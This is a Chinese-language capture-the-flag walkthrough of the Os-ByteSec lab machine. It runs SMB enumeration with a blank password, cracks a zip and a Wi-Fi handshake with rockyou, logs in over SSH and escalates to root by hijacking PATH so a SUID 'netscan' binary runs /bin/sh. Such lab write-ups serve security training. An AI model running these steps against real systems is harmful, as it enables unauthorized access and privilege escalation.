Os-ByteSec

主机发现

1 netdiscover -i eth0 -r 192.168.170.0/24

端口扫描

1 nmap -sV 192.168.170.145

访问80端口,提示使用smb攻击

目录扫描,未发现有价值的信息

1 dirb http://192.168.170.145/

SMB渗透

SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,允许应用程序和终端用户从远端的文件服务器访问文件资源

查询靶机中的用户

1 enum4linux -U 192.168.170.145

enum4linux是用于枚举系统上的SMB服务的工具,可以轻松的从与SMB服务有关的目标中快速提取信息

爆破smb用户的密码,密码为空

1 acccheck -t 192.168.170.145 -u smb -v

枚举靶机的共享资源

1 smbmap -u 'smb' -p '' -H 192.168.170.145

查看靶机的共享目录

1 smbclient -L 192.168.170.145 -U smb

通过SMB登录靶机

1 smbclient //192.168.170.145/print$ -U smb

发现文件全是0字节,但是还有一个.目录,尝试进入

1 smbclient //192.168.170.145/smb -U smb

下载main.txt查看内容,无有用信息

1 get main.txt

下载safe.zip进行解压

1 get safe.zip

发现需要密码,破解得到密码为hacker1

1 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

解压得到两个文件,secret.jpg和user.cap,打开图片未发现有用信息,然后打开流量包发现是个无线数据包,wifi名称为blackjax

使用aircrack-ng破解user.cap文件,得到密码为snowflake

1 aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

登录ssh,得到第一个flag

1 ssh [email protected] -p 2525

发现该用户不能执行sudo

查看系统中带SUID的程序

1 find / -user root -perm -4000 -print 2>/dev/null

执行netscan命令

下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令

1 scp -P 2525 [email protected]:/usr/bin/netscan /tmp
2 strace -f /tmp/netscan

通过劫持环境变量来让netscan在执行时执行其他命令

1 #tmp有写权限
2 echo "/bin/sh" > /tmp/netstat
3 chmod 777 /tmp/netstat
4 export PATH=/tmp:$PATH 
5 netscan

成功提权,得到第二个flag

 

热门相关:我的女友是丧尸   北宋大丈夫   极品仙医在都市   聊斋大圣人   重生童养媳:枭宠不乖娇妻